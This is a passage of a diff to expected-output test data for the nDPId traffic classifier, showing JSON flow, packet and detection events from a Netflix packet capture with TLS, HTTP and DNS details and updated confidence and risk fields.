+00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01391{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01352{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117826,"flow_last_seen":1484319117826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319117826,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1484319117826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319117826,"pkt":"gCqoTGHM5JjWH70UCABFAABAF8hAAEAGDxPAqAEHNCkeBdABAbshc+whAAAAALAC\/\/8t3QAAAgQFtAEDAwUBAQgKH2X2iwAAAAAEAgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117827,"flow_last_seen":1484319117827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319117827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1484319117827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319117827,"pkt":"gCqoTGHM5JjWH70UCABFAABADR1AAEAGGb7AqAEHNCkeBdACAbuRqNIFAAAAALAC\/\/\/XwQAAAgQFtAEDAwUBAQgKH2X2jAAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6809,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1484319117879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319117879,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGPL80KR4FwKgBBwG70AFaPMiyIXPsIqASOJC25AAAAgQFtAQCCAqh\/YpsH2X2iwEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1484319117881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319117881,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BiRAAEAGIMPAqAEHNCkeBdABAbshc+wiWjzIs4AQEBUN+QAAAQEICh9l9r+h\/Yps"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1484319117886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319117886,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG70ALhlhIJkajSBqASOJCQFwAAAgQFtAQCCAqh\/YptH2X2jAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6813,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1484319117890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319117890,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Pr9AAEAG6CfAqAEHNCkeBdACAbuRqNIG4ZYSCoAQEBXnJgAAAQEICh9l9sWh\/Ypt"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1484319118629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1484319118629,"pkt":"gCqoTGHM5JjWH70UCABFAABDkmsAAP8RpeXAqAEHwKgBAd8FADUALzVHkfABAAABAAAAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQAB"}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1484319118652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"ts_msec":1484319118652,"pkt":"5JjWH70UgCqoTGHMCABFAABj4U1AAEAR1ePAqAEBwKgBBwA13wUATx78kfCBgAABAAIAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQABwAwAAQABAAAADAAEuBnMCsAMAAEAAQAAAAwABLgZzBk="}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}}
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118657,"flow_last_seen":1484319118657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319118657,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1484319118657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319118657,"pkt":"gCqoTGHM5JjWH70UCABFAABAL91AAEAGxQfAqAEHuBnMCtADAFAmSxL9AAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118658,"flow_last_seen":1484319118658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319118658,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -339,71 +340,71 @@
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1484319118674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319118674,"pkt":"gCqoTGHM5JjWH70UCABFAAA0XA9AAEAGmOHAqAEHuBnMCtADAFAmSxL+8j0E\/YAQEBWcSwAAAQEICh9l+cD\/\/WqN"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1484319118674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319118674,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0ASr4P0LxYJGIqAScSCIdgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1484319118675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319118675,"pkt":"gCqoTGHM5JjWH70UCABFAAA0us1AAEAGOiPAqAEHuBnMCtAEAFDFgkYiq+D9DIAQEBUYOwAAAQEICh9l+cH\/\/WqN"}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
-00652{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
